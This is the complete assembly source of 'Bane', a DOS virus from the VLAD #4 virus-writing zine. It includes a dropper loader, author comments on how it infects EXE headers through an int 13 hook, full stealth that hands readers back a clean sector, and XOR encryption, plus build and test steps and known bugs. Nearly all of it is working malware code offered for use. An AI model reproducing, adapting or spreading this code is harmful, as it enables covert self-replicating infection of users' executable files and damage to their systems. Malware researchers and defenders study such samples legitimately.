Virus Labs & Distribution
VLAD #4 - Bane


;
; "Bane" - by Quantum [VLAD]
;
; Summary: This is an Exe Header virus that has
;          int 13 infection and full stealth
;          oh.. and just a little encryption :)
;
; Details: The virus code is a mere 256 bytes so it is optimised to shit,
;  and squeezed into the exe header at offset 100h .. the cs:ip is then
;  pointed to this code and the header length shortened by 100h bytes..
;  once we have execution the resident code is shoved in above the int
;  table at 20:0 and int 13 pointed to it.. after restoring all the reg's
;  we jump to ALMOST the original cs:ip.. (cs+10h:ip) where the host goes
;  on its way none the wiser.. as for the resident routine.. you may be
;  thinking all those pushes and pops are unnecessary.. you're wrong..
;  we check for a sector read.. if found we look to see if it's an exe and
;  if it's infected (tag: 10000000 in offset 12h) if not we infect it.. if
;  so we full stealth it .. after infecting it we re-write the sector (see
;  notes below) and then full stealth the sector we just infected!
;
; Testing/Compiling: This is a dropper written in A86.. make yourself
;  a little test executable called funnily enough "Test.exe" then compile
;  and run this source.. The test exe is now infected.. run it and any
;  read on an exe (including execute/streams/FCB's/etc) will infect that
;  exe.. but you won't know about it.. 'cause the "clean" sector will be
;  passed back to the reader.. The virus installation code will never
;  be run twice.. therefore there is no need for a residency checker..
;
; Known/Possible Bugs: Does not check to see if the exe header is standard
;  and thus will overwrite the bottom half of pklited exe headers..
;  also smart drive (bah!) has a habit of caching its writes to sectors and
;  not acknowledging them.. thus the full stealth still works when smartdrv
;  is running but no more files will be infected.. to make matters worse..
;  even if you turn off write caching smartdrv still screws around with the
;  writes.. them's the breaks..
;
; Dedication: This virus is dedicated to a loser I used to know.. this guy
;  was so lame he faked a robbery on his own house as an insurance scam and
;  stashed his puter at a mates place.  When it went sour and the insurance
;  wouldn't pay him (like usual) he accused his friend of stealing his
;  computer and ran to the cops.. a few months later they all went to court
;  and my friend proved his innocence and the loser got charged with fraud
;  and the judge awarded my friend the computer as compensation.

; -------------- This is the Loader (Just Ignore it) -----------------------

mov ax,virend-virstart ; I use this to keep my code under 100h bytes

push cs
push cs
pop ds
pop es

mov ax,03d02h
mov dx,offset fname
int 21h

xchg bx,ax

mov ah,3fh
mov si,offset buffer
mov dx,si
mov cx,200h
int 21h

push si
add si,14h
mov di,offset nip
movsw
movsw
add word [di-2],10h
pop si

sub word [si+8h],10h

mov word [si+12h],10h

push si
mov di,si
add di,14h
xor ax,ax
stosw
stosw
add di,100h - 18h
mov si,offset virstart
mov cx,virend-virstart
rep movsb
pop si

mov ax,04200h
xor cx,cx
cwd
int 21h

mov ah,40h
mov cx,200h
mov dx,si
int 21h

mov ah,3eh
int 21h

int 20h

; --------------- Virus starts here (Pay Attention) ------------------------

virstart:

        push ax

        push cs
        push cs
        pop ds
        pop es
        mov di,encstart-virstart
        call encdecrypt
        jmp encstart
encbyte: db 0

encdecrypt:
        mov ah,[encbyte-virstart]
        mov si,encstart-virstart
        mov cx,100h-(encstart-virstart)
encloop:
        lodsb
        xor al,ah
        stosb
        loop encloop
        ret

nip     dw 0000h    ; new ip
ncs     dw 0000h    ; new cs

encstart:

        in al,40h
        mov [encbyte-virstart],al

        mov ds,cx

        mov si,013h * 4
        push si
        mov di,offset old13i - virstart
        movsw
        movsw

        push ds
        pop es

        pop di
        mov ax,offset newint13 - virstart
        stosw
        mov ax,020h
        stosw

        push cs
        pop ds

        xor si,si
        mov di,200h
        mov cx,0100h
        rep movsb

        push cs
        pop ax

        add [offset ncs - virstart],ax

        mov ah,0dh
        int 21h

        pop ax

        xor dx,dx

        jmp dword ptr cs:[nip-virstart]

        db "[Bane]"

newint13:

        cmp ah,2
        jz infect

        db 0eah
old13i  dw 0
old13s  dw 0

infect:

        push si
        push di
        push ds
        push cx
        push es
        push bx
        push ax

        pushf
        call dword ptr cs:[offset old13i-virstart]
        mov cs:[orgax-virstart],ax
        jc nogood
        jmp tisok
nogood2me: clc
nogood:
        pop ax
        pop bx
        pop es
        pop cx
        pop ds
        pop di
        pop si
        mov ax,cs:[orgax-virstart]
        retf 2
tisok:

        cld

        push es
        pop ds

        cmp word ptr [bx],"ZM"
        jnz nogood2me
        mov ax,10h
        cmp word ptr [bx+12h],ax
        jz dostealth

        mov word ptr [bx+12h],ax

        push cs
        pop es

        lea si,[bx + 14h]
        push si
        mov di,offset nip - virstart
        add word ptr [si+2],ax
        movsw
        movsw

        sub word ptr [bx+8h],ax

        push ds
        pop es
        pop di

        xor ax,ax
        stosw
        stosw

        push cs
        pop ds

        xor si,si
        lea di,[bx+100h]
        mov cx,encstart-virstart
        rep movsb

        call encdecrypt

        pop ax
        pop bx
        pop es
        pop cx
        push cx
        push es
        push bx
        push ax

        mov ah,3
        pushf
        call dword ptr [offset old13i - virstart]

        push es
        pop ds

dostealth:

        push ds
        pop es

        lea si,[bx+ (offset nip - virstart)+100h]
        lea di,[bx+14h]
        mov ax,10h
        sub word ptr [si+2],ax
        movsw
        movsw

        add word ptr [bx+8h],ax

        xor ax,ax
        mov si,100h
        lea di,[bx+si]
        xchg cx,si
        rep stosb

        jmp nogood2me

orgax:

virend:

; ------------------------ End of Virus ------------------------------------

fname db "test.exe",0
buffer:

; ------------------------ End of Loader -----------------------------------
